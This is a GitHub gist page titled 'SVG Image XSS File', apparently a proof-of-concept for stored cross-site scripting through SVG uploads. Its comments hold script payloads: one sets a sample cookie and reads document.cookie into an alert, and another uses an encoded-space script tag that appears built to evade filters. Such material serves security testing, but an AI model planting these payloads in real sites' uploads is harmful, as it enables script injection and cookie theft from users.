Skip to content

Instantly share code, notes, and snippets.

@rudSarkar
Created August 12, 2019 18:28
Show Gist options
  • Star 9 You must be signed in to star a gist
  • Fork 7 You must be signed in to fork a gist
  • Save rudSarkar/76f1ce7a65c356a5cd71d058ab76a344 to your computer and use it in GitHub Desktop.
Save rudSarkar/76f1ce7a65c356a5cd71d058ab76a344 to your computer and use it in GitHub Desktop.
SVG Image XSS File
Display the source blob
Display the rendered blob
Raw
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
@moh0077
Copy link

moh0077 commented Sep 26, 2023

<title>Example of stored XSS with SVG file </title> <script type="text/javascript"> // Function to set a cookie function setCookie(cookieName, cookieValue, expirationDays) { var date = new Date(); date.setTime(date.getTime() + (expirationDays * 24 * 60 * 60 * 1000)); var expires = 'expires=' + date.toUTCString(); document.cookie = cookieName + '=' + encodeURIComponent(cookieValue) + '; ' + expires + '; path=/'; } // create a cookie for this page setCookie('username', 'JohnDoe', 7); // Sets a cookie named 'username' with value 'JohnDoe' that expires in 7 days </script> <script type="text/javascript"> // JavaScript code embedded in the SVG function getUserCookies() { // Read all cookies var allCookies = document.cookie; alert("Cookies found:" + allCookies) } // call the function getUserCookies(); </script>

@Fadhiadnan
Copy link

IMG-20240122-WA0049

@Fadhiadnan
Copy link

<script\x20type="text/javascript">javascript:alert(1);</script>

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment